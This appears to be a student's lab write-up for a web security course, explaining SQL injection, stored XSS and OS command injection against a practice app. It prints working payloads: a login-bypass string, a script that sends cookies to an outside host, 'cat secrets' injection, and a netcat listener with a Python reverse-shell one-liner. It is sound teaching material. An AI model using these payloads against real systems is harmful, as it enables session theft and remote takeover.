5.1 SQL
The string used for SQL injection:
alice@alice.com' or 'X'='X

Why it worked:
If we put " alice@alice.com' or 'X'='X " in the user name field, the resulting SQL query would be like
"SELECT * FROM users WHERE email='alice@alice.com' or 'X'='X' and password='d14a028c2a3a2bc9476102bb288
 234c415a2b01f828ea62ac5b3e42f'", which will always return the row that contain alice's from database
 regard less of the password we provided because 'X'='X' is always a valid condition therefore the WHERE
clause will always return the row of alice's record if there is any.

How it can be fixed:
- Check and process the username and password string from user input. Certain symbols such as "'<space> shall be
  removed from the string before it is parsed into SQL statements
- Change the way of validation. Instead of check if there is an record in database with username and password, it can
  be improved by querying the database with user provided username, and then compare if the password hash matches or
  not
- Use other tools such as SQLalchemy, which is object oriented and comes with internal checking mechanism.



5.2 XSS
Second Order attack:
we can update the username to <script> var image = new Image();
                                        image.src = "http://0.0.0.0:5000/news?text=".concat(document.cookie);
                              </script>
and then the javascript will be inside the database. When admin logged in, since the information of all users are
displayed including alice's username, therefore the javascript will be executed on admin's browser and post admin's
session ID as an news message.


Explain why the first order attack requires the attack code to be injected, and not just em- bedded on a third party
website:
Because if the attack code is embedded on a third party website, admin's cookie for the third party website will be
exposed which is useless information for the attacker.

Explain if you were able to fix the XSS attacks by changing the templates:
Remove  "|safe" filter from those jinja objects.
When automatic escaping is enabled, everything is escaped by default except for values explicitly marked as safe.
Variables and expressions can be marked as safe either in:
  - the context dictionary by the application with MarkupSafe.Markup, or
  -the template, with the |safe filter
If a value is not marked safe, auto-escaping will take place; which means that you could end up with double-escaped
contents. Double-escaping is easy to avoid, however: just rely on the tools Jinja2 provides and don’t use builtin
Python constructs such as str.format or the string modulo operator (%).



5.3 Injection
Explain which command you used to obtain the content of "secret", and why it works:
command: google.com; cat secrets
why it works: Because the server pass the following command directly to the OS,  'ping -c 1 ' + user_input.
If we let user input be "google.com; cat secrets", the command would be 'ping -c 1 google.com; cat secrets', which is
equivilant to execute 'ping -c 1 google.com' and 'cat secrets'. The latter command will expose the content stored on
the server


Explain which command you used to obtain the reverse shell, and why it works
on attacker's computer: $ nc -nvlp 8080
command on website: google.com; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
                    s.connect(("ATTACKER'S IP ADDRESS",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
                    os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
The attacker firstly use netcat to listen for connection on a specific port. Similar to the previous one, the above
message is parsed to 'ping -c 1 google.com' and 'python -c "SOME CODE"'. The latter one can establish a TCP connection
to the attacker and then the attacker can receive a reverse shell.
